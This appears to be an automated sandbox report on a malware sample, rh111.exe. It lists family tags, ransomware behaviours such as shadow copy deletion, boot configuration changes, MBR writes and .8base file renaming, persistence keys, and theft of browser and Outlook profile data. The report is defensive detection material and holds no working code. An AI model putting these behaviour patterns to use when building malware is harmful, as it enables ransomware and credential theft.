Malware Analysis Report

2024-10-16 05:11

Sample ID 231001-v7xgascc2s
Target rh111.exe
SHA256 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636
Tags
ammyyadmin dcrat flawedammyy phobos rhadamanthys smokeloader backdoor bootkit collection evasion infostealer persistence ransomware rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636

Threat Level: Known bad

The file rh111.exe was found to be: Known bad.

Malicious Activity Summary

ammyyadmin dcrat flawedammyy phobos rhadamanthys smokeloader backdoor bootkit collection evasion infostealer persistence ransomware rat spyware stealer trojan

SmokeLoader

Detect rhadamanthys stealer shellcode

Phobos

AmmyyAdmin payload

FlawedAmmyy RAT

Ammyy Admin

DcRat

Rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Deletes shadow copies

Modifies boot configuration data using bcdedit

Renames multiple (303) files with added filename extension

Deletes backup catalog

Downloads MZ/PE file

Modifies Windows Firewall

Reads user/profile data of web browsers

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

Deletes itself

Drops startup file

Drops desktop.ini file(s)

Accesses Microsoft Outlook profiles

Looks up external IP address via web service

Adds Run key to start application

Writes to the Master Boot Record (MBR)

Suspicious use of SetThreadContext

Drops file in Program Files directory

Enumerates physical storage devices

Program crash

Unsigned PE

Checks SCSI registry key(s)

Creates scheduled task(s)

Suspicious behavior: GetForegroundWindowSpam

Uses Volume Shadow Copy service COM API

outlook_win_path

Suspicious behavior: EnumeratesProcesses

outlook_office_path

Suspicious behavior: MapViewOfSection

Interacts with shadow copies

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Runs ping.exe

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-01 17:38

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-01 17:38

Reported

2023-10-01 17:41

Platform

win10v2004-20230915-en

Max time kernel

100s

Max time network

165s

Command Line

C:\Windows\Explorer.EXE

Signatures

Ammyy Admin

rat ammyyadmin

AmmyyAdmin payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

DcRat

rat infostealer dcrat

Detect rhadamanthys stealer shellcode

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

FlawedAmmyy RAT

trojan flawedammyy

Phobos

ransomware phobos

Rhadamanthys

stealer rhadamanthys

SmokeLoader

trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 444 created 3164 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Windows\Explorer.EXE

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (303) files with added filename extension

ransomware

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\ECAF.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\ECAF.exe N/A

Drops startup file

Description Indicator Process Target
File created \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\X2MpkYv.exe C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook C:\Windows\system32\certreq.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Windows\system32\certreq.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Windows\system32\certreq.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook C:\Windows\system32\certreq.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook C:\Windows\system32\certreq.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Windows\system32\certreq.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\X2MpkYv = "C:\\Users\\Admin\\AppData\\Local\\X2MpkYv.exe" C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\X2MpkYv = "C:\\Users\\Admin\\AppData\\Local\\X2MpkYv.exe" C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\$Recycle.Bin\S-1-5-21-1141987721-3945596982-3297311814-1000\desktop.ini C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-1141987721-3945596982-3297311814-1000\desktop.ini C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\desktop.ini C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\2CE2.tmp\svchost.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\TEMPSITC.TTF C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CASCADE\CASCADE.ELM C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ThirdPartyNotices.MSHWLatin.txt C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Internet Explorer\de-DE\ieinstal.exe.mui C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019R_Grace-ppd.xrm-ms C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdCO365R_SubTrial-ppd.xrm-ms C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\hprof.dll C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Java\jre1.8.0_66\bin\prism_common.dll.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL065.XML C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Microsoft Office\root\rsod\office.x-none.msi.16.x-none.tree.dat.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.properties.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives.nl_zh_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProVL_MAK-ul-phn.xrm-ms C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ecf.filetransfer_5.0.0.v20140827-1444.jar C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse.nl_zh_4.4.0.v20140623020002.jar.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProR_Retail-ul-phn.xrm-ms C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Microsoft.Data.Edm.dll C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Common Files\microsoft shared\ClickToRun\api-ms-win-core-file-l2-1-0.dll.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\Alphabet.xml C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\he.pak.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\db\bin\setNetworkServerCP.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ARCTIC\PREVIEW.GIF C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\LyncVDI_Eula.txt C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSOHTMED.EXE C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL118.XML C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Common Files\System\ado\it-IT\msader15.dll.mui C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\ta.pak.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Trial-pl.xrm-ms C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_Grace-ppd.xrm-ms.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\MSVCP140_APP.DLL.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PROOF\MSSP7FR.LEX.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\derby_common.bat C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_ko.properties.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.xml.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\AUDIOSEARCHLTS.DLL C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdO365R_SubTest-ppd.xrm-ms C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN089.XML C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-oql.xml.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-api-caching.xml C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_OEM_Perp-pl.xrm-ms C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\VisioProCO365R_SubTrial-ul-oob.xrm-ms.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial5-ppd.xrm-ms.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019VL_KMS_Client_AE-ppd.xrm-ms.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\fi\msipc.dll.mui C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\PIXEL\PREVIEW.GIF.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\title.htm C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_winxp_blu.css.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-options_ja.jar.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-api.jar.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\db2v0801.xsl.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\da.txt C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Java\jre1.8.0_66\lib\security\java.security.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\1033\GRAPH.HXS.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\IACOM2.DLL.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_Retail-ppd.xrm-ms.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentR_OEM_Perp-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial4-ppd.xrm-ms C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription4-pl.xrm-ms.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\base_kor.xml C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\hu-HU\tipresx.dll.mui C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\license.html.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Java\jre1.8.0_66\bin\keytool.exe.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019VL_KMS_Client_AE-ul.xrm-ms.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Cartridges\sql70.xsl.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\System32\vds.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\certreq.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\certreq.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe N/A
N/A N/A C:\Windows\system32\certreq.exe N/A
N/A N/A C:\Windows\system32\certreq.exe N/A
N/A N/A C:\Windows\system32\certreq.exe N/A
N/A N/A C:\Windows\system32\certreq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
